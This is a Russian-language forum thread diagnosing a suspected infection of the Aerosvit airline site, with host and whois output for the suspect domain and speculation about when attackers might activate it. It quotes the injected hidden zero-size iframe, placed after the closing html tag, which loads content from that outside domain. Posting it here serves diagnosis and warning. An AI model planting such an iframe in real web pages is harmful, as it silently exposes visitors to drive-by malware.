Проверила Ваши ссылки на он лайн сканере Доктора Веба, - показывает - чисто, Первую ссылку все же открыла, так что поставила комп на полную проверку,

Что-то нехорошее там есть:


Но по этому урлу выдаётся Error 404, причём почему-то в гугловском оформлении, хотя сайт хостится не в гугле.

$ host caseyveggies.us
caseyveggies.us has address 178.162.170.82

$ whois 178.162.170.82
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '178.162.170.0 - 178.162.170.255'

inetnum: 178.162.170.0 - 178.162.170.255
netname: Tower-Marketing-Limited-968076
descr: Tower-Marketing-Limited
country: BZ
admin-c: KS599-RIPE
tech-c: LSWG-RIPE
status: ASSIGNED PA
mnt-by: NETDIRECT-MNT
mnt-lower: NETDIRECT-MNT
mnt-routes: NETDIRECT-MNT
source: RIPE # Filtered

person: Karpenko Sergey
address: Tower Marketing Limited
address: Suite 102, Ground Floor, Blake Building,
address: Corner Eyre & Hutson Streets,
address: Belize city, Belize
address: BZ
phone: +501 223 2810
fax-no: +501 223 3132
abuse-mailbox: support@sartelekom.ru
nic-hdl: KS599-RIPE
mnt-by: NETDIRECT-MNT
source: RIPE # Filtered

person: RIPE Mann
address: Kleyerstrasse 79 / Tor 13
address: 60326 Frankfurt am Main
address: Germany
phone: +49 69 90556880
fax-no: +49 69 9055688-22
abuse-mailbox: abuse@leaseweb.de
nic-hdl: LSWG-RIPE
mnt-by: OCOM-MNT
source: RIPE # Filtered

% Information related to '178.162.128.0/17AS28753'

route: 178.162.128.0/17
descr: ORG-nA8-RIPE
origin: AS28753
org: ORG-nA8-RIPE
mnt-lower: NETDIRECT-MNT
mnt-routes: NETDIRECT-MNT
mnt-by: NETDIRECT-MNT
source: RIPE # Filtered

organisation: ORG-nA8-RIPE
org-name: Leaseweb Germany GmbH
org-type: LIR
address: Leaseweb Germany GmbH Kleyer Strasse 79 / Tor 13 60326 Frankfurt Germany
phone: +496990556880
fax-no: +4969905568822
mnt-ref: NETDIRECT-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
admin-c: LSWG-RIPE
source: RIPE # Filtered

iframe в самом конце страницы, после закрывающего /html, и нулевого размера. Однозначно зараза какая-то:

</html>
<iframe name="ddSDUIOuIjdhgx" src="http://caseyveggies.us/t/73dceb48abf3e51a83c88303ffb2ed10" marginwidth="1" marginheight="0"
title="SoSDiosdhu" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>

Сайт этот, кстати, хитрый. Если заходить браузером напрямую, то он выдает 404 в виньетке гугла, а вот если обращаться к нему с параметрами (как скрипт и делает), то не факт..

Посмотрел firebug'ом, у меня iframe содержит ту же 404 ошибку. Но, конечно, может быть иногда он содержит что-нибудь другое.

Я думаю, что сейчас там пока всё тихо подчищено, но когда надо, всё будет заполнено соответствующим кодом.

Хотя момент удачный, с 01.06 Аэросвит дал рекламу, что заполнив форму опроса, можно заработать халявных миль для FFP, так что народ ломанулся на сайт заполнять опросы и с точки зрения хацкеров было бы логично именно сейчас включить код.

Впрочем, думаю, что заражение Аэросвита произошло не целевым образом, а тупо случайно и по причине незащищенности скриптов на сайте, а никто именно в него и не целился особенно..